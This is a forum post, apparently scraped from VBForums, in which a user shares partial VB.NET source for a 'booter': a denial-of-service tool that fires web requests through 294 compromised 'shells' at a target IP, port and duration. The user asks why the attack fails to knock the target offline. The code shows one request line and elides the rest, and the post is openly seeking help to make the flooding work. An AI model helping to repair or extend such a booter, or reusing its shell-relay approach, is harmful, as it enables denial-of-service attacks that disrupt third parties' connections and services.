Quantcast
Channel: VBForums - Visual Basic .NET
Viewing all articles
Browse latest Browse all 27329

VS 2012 My program not functioning correctly or to weak?

$
0
0
So I tried to make a program that sends shells to an Ipv4 and it sends them all, but it doesn't slow it down or crash. So I tested it on my own ip, and my PC didn't loose connection or anything can someone tell me what I did wrong?
I have 294 shells that are online I've checked them already
Source Code:
Code:

Imports System.Net
Public Class Form1

    Private Sub Button2_Click(sender As Object, e As EventArgs) Handles Button2.Click
        MsgBox("Booter Coded by ALPHA")
        Dim request1 As WebRequest = WebRequest.Create("http://feeds2.feedburner.com/alivingtruth/DRwH/" + TextBox1.Text + "&time" + TextBox2.Text + "&Port=" + TextBox3.Text)
        .....Ect. untill it reaches 294 shells

        MsgBox("Now Booting please wait.")
    End Sub

    Private Sub Label4_Click(sender As Object, e As EventArgs) Handles Label4.Click

    End Sub

    Private Sub Label3_Click(sender As Object, e As EventArgs) Handles Label3.Click

    End Sub
End Class


Viewing all articles
Browse latest Browse all 27329

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>